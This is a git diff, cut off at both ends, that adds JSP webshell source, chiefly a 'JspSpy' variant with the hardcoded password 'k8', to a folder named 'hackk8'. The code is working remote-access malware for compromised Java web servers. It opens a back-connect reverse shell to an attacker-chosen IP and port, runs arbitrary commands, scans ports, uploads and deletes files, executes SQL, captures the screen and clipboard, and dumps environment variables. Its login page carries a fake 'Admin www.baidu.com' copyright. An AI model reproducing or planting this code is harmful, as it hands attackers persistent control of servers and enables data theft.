+JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); +} +out.println("

    System Environment >>


      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new 
VPortScanInvoker());
+ins.put("portScan",new PortScanInvoker());
+ins.put("vConn",new VConnInvoker());
+ins.put("dbc",new DbcInvoker());
+ins.put("executesql",new ExecuteSQLInvoker());
+ins.put("vLogin",new VLoginInvoker());
+ins.put("login",new LoginInvoker());
+ins.put("filelist", new FileListInvoker());
+ins.put("logout",new LogoutInvoker());
+ins.put("upload",new UploadInvoker());
+ins.put("copy",new CopyInvoker());
+ins.put("bottom",new BottomInvoker());
+ins.put("vCreateFile",new VCreateFileInvoker());
+ins.put("vEdit",new VEditInvoker());
+ins.put("createFile",new CreateFileInvoker());
+ins.put("vEditProperty",new VEditPropertyInvoker());
+ins.put("editProperty",new EditPropertyInvoker());
+ins.put("vs",new VsInvoker());
+ins.put("shell",new ShellInvoker());
+ins.put("down",new DownInvoker());
+ins.put("vd",new VdInvoker());
+ins.put("downRemote",new DownRemoteInvoker());
+ins.put("index",new IndexInvoker());
+ins.put("mkdir",new MkDirInvoker());
+ins.put("move",new MoveInvoker());
+ins.put("removedir",new RemoteDirInvoker());
+ins.put("packBatch",new PackBatchInvoker());
+ins.put("pack",new PackInvoker());
+ins.put("unpack",new UnPackInvoker());
+ins.put("vmp",new VmpInvoker());
+ins.put("vbc",new VbcInvoker());
+ins.put("backConnect",new BackConnectInvoker());
+ins.put("jspEnv",new JspEnvInvoker());
+ins.put("smp",new SmpInvoker());
+ins.put("mapPort",new MapPortInvoker());
+ins.put("top",new TopInvoker());
+ins.put("vso",new VOnLineShellInvoker());
+ins.put("online",new OnLineInvoker());
+}
+%>
+<%
+try {
+String o = request.getParameter("o");
+if (!Util.isEmpty(o)) {
+Invoker in = ins.get(o);
+if (in == null) {
+response.sendRedirect(SHELL_NAME+"?o=index");
+} else {
+if (in.doBefore()) {
+String path = request.getParameter("folder");
+if (!Util.isEmpty(path))
+session.setAttribute(CURRENT_DIR,path);
+ins.get("before").invoke(request,response,session);
+ins.get("script").invoke(request,response,session);
+ins.get("top").invoke(request,response,session);
+}
+in.invoke(request,response,session);
+if (!in.doAfter()) {
+return;
+}else{
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+}
+} else {
+response.sendRedirect(SHELL_NAME+"?o=index");
+}
+} catch (Exception e) {
+ByteArrayOutputStream bout = new ByteArrayOutputStream();
+e.printStackTrace(new PrintStream(bout));
+session.setAttribute(CURRENT_DIR,SHELL_DIR);
+Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left");
+bout.close();
+out.flush();
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+%>
diff --git a/jsp/hackk8/JSP/other/jspspy_k8.jsp b/jsp/hackk8/JSP/other/jspspy_k8.jsp
new file mode 100644
index 0000000..4cd20f1
--- /dev/null
+++ b/jsp/hackk8/JSP/other/jspspy_k8.jsp
@@ -0,0 +1,2323 @@
+<%@page pageEncoding="UTF-8"%>
+<%@page import="java.io.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.util.regex.*"%>
+<%@page import="java.sql.*"%>
+<%@page import="java.nio.charset.*"%>
+<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
+<%@page import="java.text.*"%>
+<%@page import="java.net.*"%>
+<%@page import="java.util.zip.*"%>
+<%@page import="java.awt.*"%>
+<%@page import="java.awt.image.*"%>
+<%@page import="javax.imageio.*"%>
+<%@page import="java.awt.datatransfer.DataFlavor"%>
+<%@page import="java.util.prefs.Preferences"%>
+<%!
+private static final String PW = "k8";
+private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
+private static final String REQUEST_CHARSET = "ISO-8859-1";
+private static final String PAGE_CHARSET = "UTF-8";
+private static final String CURRENT_DIR = "currentdir";
+private static final String MSG = "SHOWMSG";
+private static final String PORT_MAP = "PMSA";
+private static final String DBO = "DBO";
+private static final String SHELL_ONLINE = "SHELL_ONLINE";
+private static String SHELL_NAME = "";
+private static String WEB_ROOT = null;
+private static String SHELL_DIR = null;
+public static Map ins = new HashMap();
+private static class MyRequest extends HttpServletRequestWrapper {
+public MyRequest(HttpServletRequest req) {
+super(req);
+}
+public String getParameter(String name) {
+try {
+String value = super.getParameter(name);
+if (name == null)
+return null;
+return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET);
+} catch (Exception e) {
+return null;
+}
+}
+}
+private static class DBOperator{
+private Connection conn = null;
+private Statement stmt = null;
+private String driver;
+private String url;
+private String uid;
+private String pwd;
+public DBOperator(String driver,String url,String uid,String pwd) throws Exception {
+this(driver,url,uid,pwd,false);
+}
+public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws 
Exception {
+Class.forName(driver);
+if (connect)
+this.conn = DriverManager.getConnection(url,uid,pwd);
+this.url = url;
+this.driver = driver;
+this.uid = uid;
+this.pwd = pwd;
+}
+public void connect() throws Exception{
+this.conn = DriverManager.getConnection(url,uid,pwd);
+}
+public Object execute(String sql) throws Exception {
+if (isValid()) {
+stmt = conn.createStatement();
+if (stmt.execute(sql)) {
+return stmt.getResultSet();
+} else {
+return stmt.getUpdateCount();
+}
+}
+throw new Exception("Connection is inValid.");
+}
+public void closeStmt() throws Exception{
+if (this.stmt != null)
+stmt.close();
+}
+public boolean isValid() throws Exception {
+return conn != null && !conn.isClosed();
+}
+public void close() throws Exception {
+if (isValid()) {
+closeStmt();
+conn.close();
+}
+}
+public boolean equals(Object o) {
+if (o instanceof DBOperator) {
+DBOperator dbo = (DBOperator)o;
+return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd);
+}
+return false;
+}
+}
+private static class StreamConnector extends Thread {
+private InputStream is;
+private OutputStream os;
+public StreamConnector( InputStream is, OutputStream os ){
+this.is = is;
+this.os = os;
+}
+public void run(){
+BufferedReader in = null;
+BufferedWriter out = null;
+try{
+in = new BufferedReader( new InputStreamReader(this.is));
+out = new BufferedWriter( new OutputStreamWriter(this.os));
+char buffer[] = new char[8192];
+int length;
+while((length = in.read( buffer, 0, buffer.length ))>0){
+out.write( buffer, 0, length );
+out.flush();
+}
+} catch(Exception e){}
+try{
+if(in != null)
+in.close();
+if(out != null)
+out.close();
+} catch( Exception e ){}
+}
+}
+private static class OnLineProcess {
+private String cmd = "first";
+private Process pro;
+public OnLineProcess(Process p){
+this.pro = p;
+}
+public void setPro(Process p) {
+this.pro = p;
+}
+public void setCmd(String c){
+this.cmd = c;
+
+}
+public String getCmd(){
+return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? 
"" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = 
Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(" "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = 
response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
    +try{
    +out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
    +}catch (Exception ex) {
    +out.println("ClipBoard is Empty Or Is Not Text Data !");
    +}
    +out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout (秒) : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
